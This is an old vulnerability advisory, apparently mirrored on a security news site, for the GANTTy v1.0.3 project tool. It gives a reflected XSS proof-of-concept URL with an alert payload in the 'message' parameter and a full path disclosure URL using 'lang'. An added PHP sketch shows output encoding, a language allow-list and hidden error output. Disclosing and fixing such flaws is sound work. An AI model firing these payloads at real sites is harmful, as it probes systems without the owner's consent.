Computer Security
[EN] securityvulns.ru

From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date:07.06.2006
Subject:GANTTy v1.0.3

GANTTy v1.0.3

Homepage:
http://www.gantty.com

Affected files:
index.php

XSS Vulnerabilities PoC:

XSS Vulnerability:
http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=


Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE /var/www/username/actions/authenticate.php
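
Editor's added example, not part of the advisory and not GANTTy's code: a PHP sketch of handling the `message` and `lang` parameters defensively, with output encoding, an allow-list for the language code, and errors logged instead of displayed. The function names, the language list and the sample values are assumptions made for illustration; why `lang='` triggers the error is not stated in the advisory.

```php
<?php
// Added example, not GANTTy source. Function names, the language list and
// the sample values are assumptions made for illustration.

// Allow-list of language codes (constructed; the real list is not on the page).
const ALLOWED_LANGS = ['en', 'de', 'fr'];

// Encode a request value for an HTML text or quoted-attribute context.
function render_message(string $message): string
{
    return htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only known language codes; anything else falls back to the default,
// so a stray quote never reaches a file path or a query.
function pick_lang(?string $lang, string $default = 'en'): string
{
    return in_array($lang, ALLOWED_LANGS, true) ? $lang : $default;
}

// Log failures server-side and return a generic message, so absolute paths
// stay out of the response body.
function install_quiet_errors(): void
{
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');
    set_exception_handler(function (Throwable $e): void {
        error_log($e->getMessage() . ' in ' . $e->getFile() . ':' . $e->getLine());
        http_response_code(500);
        echo 'Internal error';
    });
}

install_quiet_errors();

// Constructed sample values shaped like the two requests in the advisory.
$message = "<IMG SRC=javascript:alert('XSS')> email";
$lang    = "'";

// The markup is emitted as inert text; the invalid language code is replaced
// by the default before it is used anywhere.
echo '<p class="message">' . render_message($message) . "</p>\n";
echo 'lang=' . pick_lang($lang) . "\n";
```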
